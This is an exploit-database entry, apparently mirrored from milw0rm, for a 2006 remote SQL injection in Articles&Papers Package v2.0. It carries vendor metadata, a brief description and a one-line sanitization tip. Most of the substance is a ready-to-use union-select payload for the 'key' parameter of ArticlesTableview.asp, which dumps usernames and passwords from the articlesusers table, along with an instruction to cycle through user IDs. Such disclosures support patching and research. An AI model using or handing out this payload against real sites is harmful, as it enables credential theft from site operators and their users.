header-logo
Suggest Exploit
vendor:
Articles&Papers Package
by:
ajann
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Articles&Papers Package
Affected Version From: v2.0
Affected Version To: v2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:t-dreams:articles_and_papers_package
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the ArticlesTableview.asp page. The attacker can use the 'key' parameter to inject arbitrary SQL code. For example, an attacker can use the following URL to inject malicious SQL code: http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]. The attacker can also use the 'userid' parameter to change the user ID in the query. For example, ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability

# Author :   ajann

# Script Page : http://www.t-dreams.com

# Exploit;

*******************************************************************************

###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]

Example:
ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18

Pls UserID Change(1,2,3,4,5.....)

# ajann,Turkey
# ...
# Im not [Turkish]Hacker!

# milw0rm.com [2006-09-17]

Navigation

Suggest Exploit

Services By CQR